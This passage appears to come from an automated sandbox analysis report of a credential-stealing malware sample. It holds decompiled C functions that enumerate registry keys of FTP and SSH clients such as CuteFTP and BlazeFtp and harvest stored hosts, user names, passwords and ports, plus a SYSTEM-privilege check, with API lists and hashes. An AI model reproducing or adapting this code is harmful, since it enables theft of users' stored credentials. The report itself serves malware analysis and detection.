					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
					return E00401553(_t38, _t43, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t30 = StrStrIA(_t39, "CUTEFTP"); // executed
					_t41 = _t30;
					if(_t30 != 0) {
						_t34 = E0040234A(_t41, _t39);
						if(E0040234A(_t41, _t39) != 0) {
							E00404FD8(_t37, _a4, _t34, "\\sm.dat");
							E004017D5(_t34);
						}
					}
					asm("cld");
					_t37 = 0xffffffff;
					asm("repne scasb");
					_t43 =  *_t39;
				} while ( *_t39 != 0);
				goto L5;
			}

APIs

StrStrIA.SHLWAPI(00000000,CUTEFTP), ref: 004051DF

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405270
\sm.dat, xrefs: 004051F3
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405249
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040527D
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405263
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 0040523C
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405256
Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040528A
CUTEFTP, xrefs: 004051D9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
API String ID: 1884169789-3073816274
Opcode ID: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
Instruction ID: c9e65f93459612828945218a38d798e19f240a3487c00c51deca1f9608bf85c0
Opcode Fuzzy Hash: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
Instruction Fuzzy Hash: D8215E706841097ACF117F21CD03F8E3E269F907A4F10413AB9197C0F2CBBD9A919A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406229, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406229(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr* _v2092;
				char _v2096;
				char _v2100;
				long _t57;
				long _t58;
				intOrPtr* _t72;

				_t57 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "PW", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "PthR", 0);
						_t72 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2096);
						if(_t72 == 0 || _v2096 != 4) {
							_t73 = _t72;
							if(_t72 != 0) {
								E004017D5(_t73);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t72;
							E004017D5(_t72);
						}
						_v2092 = E00401C8E( *0x4140fe, _v2068, "SSH",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2088);
							E004014E8(_a4, _v2084);
							if(_v2092 == 0 || _v2100 != 4) {
								E00401486(_a4, 0);
							} else {
								E00401486(_a4,  *_v2092);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2092);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040623F
RegEnumKeyExA.ADVAPI32 ref: 00406273
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406481

Strings

Host, xrefs: 004062C3
SSH, xrefs: 00406370
PthR, xrefs: 004062FF
Port, xrefs: 00406322
User, xrefs: 004062E1

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: 33638be76883ce77d589ccc560b81723aa9d63a9a6b4dfce219b775cf0549403
Instruction ID: dc339f5e81026a45414f470924930b9f0486a9fc6d38709ffe0ea3c9b7bda71c
Opcode Fuzzy Hash: 33638be76883ce77d589ccc560b81723aa9d63a9a6b4dfce219b775cf0549403
Instruction Fuzzy Hash: FA51E63194011CEADF216BA2CC42BDD7AB9BF08704F14C0BAB545750B1DB7A5EA19FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405D78, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D78(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				long _t48;
				long _t49;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostAdrs", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "UserName", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "RemoteDir", 0);
						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
						if(_t64 == 0 || _v2092 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004017D5(_t65);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t64;
							E004017D5(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
							E00401486(_a4, _v2088);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405D8E
RegEnumKeyExA.ADVAPI32 ref: 00405DC2
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F6E

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

UserName, xrefs: 00405E36
Port, xrefs: 00405E77
HostAdrs, xrefs: 00405E18
Password, xrefs: 00405DFA
RemoteDir, xrefs: 00405E54

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: 431c71695cd2a431547e5242a936ed43439a6d4ef0bb3b348d5cbf17716896b8
Instruction ID: 895065a577242a1dc8cf9cb542de238b46a37634af73f481449c44b05c989335
Opcode Fuzzy Hash: 431c71695cd2a431547e5242a936ed43439a6d4ef0bb3b348d5cbf17716896b8
Instruction Fuzzy Hash: E041F53194011DAADF216BA2CC42BDE7AB9FF04304F10C0BAB544751B1DB7A5E92AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004071D3, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004071D3(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t62);
						_v2080 = E00401C8E(_a8, _v2068, "FtpPassword", 0);
						_v2084 = E00401C8E(_a8, _v2068, "_FtpPassword", 0);
						_v2072 = E00401C8E(_a8, _v2068, "FtpServer", 0);
						_v2076 = E00401C8E(_a8, _v2068, "FtpUserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "FtpDirectory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E00401486(_a4, 0xbeef0000);
								E004014E8(_a4, _v2072);
								E004014E8(_a4, _v2076);
								E004014E8(_a4, _v2080);
								E004014E8(_a4, _v2084);
								E004014E8(_a4, _v2088);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004071D3(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071E6
RegEnumKeyExA.ADVAPI32 ref: 0040721A
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073AC

Strings

_FtpPassword, xrefs: 0040726D
FtpServer, xrefs: 00407288
FtpDirectory, xrefs: 004072BE
FtpPassword, xrefs: 00407252
FtpUserName, xrefs: 004072A3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: f352eb7a3a3a567e6c51108ad8ada27e353cf21c43d5d0eec35ff94588182c15
Instruction ID: eb35d637fb60ff57c6ef9e79c42a55e3363b4def4f450bd9d6fd20052dedf9b6
Opcode Fuzzy Hash: f352eb7a3a3a567e6c51108ad8ada27e353cf21c43d5d0eec35ff94588182c15
Instruction Fuzzy Hash: 2E41C53194011CBADF226F51CC42BDC7BB6BF04304F10C0BAB958751B1DBBA5A92AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA5F, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA5F(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				long _t57;
				long _t58;

				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t63);
						_v2068 = E00401C8E(_a4, _v2092, "HostName", 0);
						_v2072 = E00401C8E(_a4, _v2092, "UserName", 0);
						_v2076 = E00401C8E(_a4, _v2092, "Password", 0);
						_v2080 = E00401C8E(_a4, _v2092, "PortNumber",  &_v2088);
						_v2084 = E00401C8E(_a4, _v2092, "TerminalType", 0);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2068);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014BC(_a12, _v2080, _v2088);
							E004014E8(_a12, _v2084);
						}
						E0040DA5F(_a4, _v2092, _a12);
						E004017D5(_v2092);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA72
RegEnumKeyExA.ADVAPI32 ref: 0040DAA6
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DC3A

Strings

HostName, xrefs: 0040DADE
Password, xrefs: 0040DB14
UserName, xrefs: 0040DAF9
PortNumber, xrefs: 0040DB34
TerminalType, xrefs: 0040DB4F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: c22ab1647ba881019c642ce5e375ed652d00b9c8488e27d5bcc6e29b573895a8
Instruction ID: 74ed6bc0f2f1019c4438166421eefdcc1314a9bab96f8c2a3f024f8d1cd312b8
Opcode Fuzzy Hash: c22ab1647ba881019c642ce5e375ed652d00b9c8488e27d5bcc6e29b573895a8
Instruction Fuzzy Hash: 1F41B83194011CBBDF226F91CC42BDD7AB5BF04304F1080BAB545750B2DF7A9AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA8, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FA8(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t62);
						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
						_v2084 = E00401C8E(_a8, _v2068, "_Password", 0);
						_v2072 = E00401C8E(_a8, _v2068, "Server", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "Directory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E00401486(_a4, 0xbeef0000);
								E004014E8(_a4, _v2072);
								E004014E8(_a4, _v2076);
								E004014E8(_a4, _v2080);
								E004014E8(_a4, _v2084);
								E004014E8(_a4, _v2088);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E00406FA8(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FBB
RegEnumKeyExA.ADVAPI32 ref: 00406FEF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407181

Strings

Password, xrefs: 00407027
Directory, xrefs: 00407093
Server, xrefs: 0040705D
_Password, xrefs: 00407042
UserName, xrefs: 00407078

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: 42fbef6f6529482de62ebaa24f1facc4f4f3595325c7a0f14c9b057af7bdbd20
Instruction ID: 6887f4d4dc4833aea87068e0bfe498b125db7ab105371447aa8d5c49bdf339d4
Opcode Fuzzy Hash: 42fbef6f6529482de62ebaa24f1facc4f4f3595325c7a0f14c9b057af7bdbd20
Instruction Fuzzy Hash: BA41C33194011CBADF226F51CC42BDCBAB6BF04304F14C0BAB558751B1DB7A5AA2AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406010, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406010(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t48;
				long _t49;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "Port", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_v2088 = E00401C8E( *0x4140fe, _v2068, "HostDirName", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
							E004014E8(_a4, _v2088);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2088);
						E00406010(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406026
RegEnumKeyExA.ADVAPI32 ref: 0040605A
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004061EF

Strings

HostName, xrefs: 004060B0
Port, xrefs: 004060CE
Username, xrefs: 004060EC
Password, xrefs: 00406092
HostDirName, xrefs: 0040610A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: b4d8cf1640381694cc81f35b3c5a29c4504e5c6baacdd4194a686e989411f198
Instruction ID: 661ca5f8eecc736091142f07f5f5879c64b4d0dd11ba7ceb6d40fcb3e2135ea1
Opcode Fuzzy Hash: b4d8cf1640381694cc81f35b3c5a29c4504e5c6baacdd4194a686e989411f198
Instruction Fuzzy Hash: 0D41B53194011CAADF226F92CC42BDC7AB9BF44704F10C0BAB545750B1DB7A5EA2AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D625, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D625(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t46;
				long _t47;

				_t46 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t47 = _t46;
				if(_t47 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2088 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t52);
						_v2068 = E00401C8E( *0x4140fe, _v2088, "Host", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2088, "User", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2088, "Pass", 0);
						_v2080 = E00401C8E( *0x4140fe, _v2088, "Port", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2088, "Remote Dir", 0);
						if(_v2072 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2068);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
						}
						E0040D625(_a4, _v2088);
						E004017D5(_v2088);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t47;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D63B
RegEnumKeyExA.ADVAPI32 ref: 0040D66F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D7F2

Strings

Host, xrefs: 0040D6A7
Port, xrefs: 0040D701
User, xrefs: 0040D6C5
Pass, xrefs: 0040D6E3
Remote Dir, xrefs: 0040D71F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 028aa4547a8f975e74787c54352b77b1a4b0608344862c9357c73e981692f7de
Instruction ID: fa02369c385350f7445e4dbac51c9b2e56b62a742fd5d540ae24488e7f34cbe6
Opcode Fuzzy Hash: 028aa4547a8f975e74787c54352b77b1a4b0608344862c9357c73e981692f7de
Instruction Fuzzy Hash: 7241A931940118BBDF216FA2CD42BDC7AB6BF08704F14C0B6B648754B1DA7A5E91AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00402B27, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00402B27(void* __eax, void* __edx) {
				void* _v8;
				long _v12;
				void* _v16;
				CHAR* _v20;
				void* _t21;
				int _t26;
				int _t32;
				int _t39;
				void* _t42;

				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
					_t42 = 0;
					_t21 = GetCurrentProcess();
					_push( &_v8);
					_push(8);
					_push(_t21);
					if( *0x41440d() != 0) {
						_v12 = 0;
						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
							_v16 = E004017EC(_v12);
							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
							if(_t32 != 0) {
								_push( &_v20);
								_push( *_v16);
								if( *0x414419() != 0) {
									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
									if(_t39 == 0) {
										_t42 = 1;
									}
									LocalFree(_v20);
								}
							}
							E004017D5(_v16);
						}
						CloseHandle(_v8);
					}
					return _t42;
				} else {
					return 0;
				}
			}

APIs

GetCurrentProcess.KERNEL32 ref: 00402B56
GetTokenInformation.KERNELBASE(00410B87,00000001,00000000,00000000,00000000), ref: 00402B84
GetLastError.KERNEL32 ref: 00402B8E
GetTokenInformation.KERNELBASE(00410B87,00000001,?,00000000,00000000,00000000), ref: 00402BB8
lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
CloseHandle.KERNEL32(00410B87), ref: 00402BFB

Strings

S-1-5-18, xrefs: 00402BD6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$CloseCurrentErrorFreeHandleLastLocalProcesslstrcmp
String ID: S-1-5-18
API String ID: 887674703-4289277601
Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C888, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C888(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t34;
				char* _t49;
				intOrPtr _t53;
				void* _t58;
				char* _t59;

				_t58 = __edx;
				_v8 = E0040150D(_a4, 0x3f, 0);
				_t59 =  *0x414082; // 0x0
				if( *_t59 == 0) {
					L5:
					E0040417C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
					_t34 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
					_v24 = _t34;
					_v16 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
					_v20 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
					_v28 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
					if(_v16 != 0 && _v20 != 0) {
						_t66 = _v24;
						if(_v24 != 0) {
							E00401486(_a4, 0xbeef0001);
							E004014E8(_a4, _v16);
							E004014E8(_a4, _v20);
							E004014E8(_a4, _v24);
							E004014BC(_a4, _v28, _v32);
						}
					}
					E004017D5(_v24);
					E004017D5(_v16);
					E004017D5(_v20);
					E004017D5(_v28);
					return E00401553(_t58, _t66, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 = StrStrIA(_t59, "BlazeFtp");
					_t61 = _t49;
					if(_t49 != 0) {
						_t53 = E0040234A(_t61, _t59);
						if(_t53 != 0) {
							_v12 = _t53;
							E00404131(_a4, _v12, "site.dat", 0xbeef0000);
							E004017D5(_v12);
						}
					}
					asm("cld");
					asm("repne scasb");
				} while ( *_t59 != 0);
				goto L5;
			}

APIs

StrStrIA.SHLWAPI(00000000,BlazeFtp), ref: 0040C8AF

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

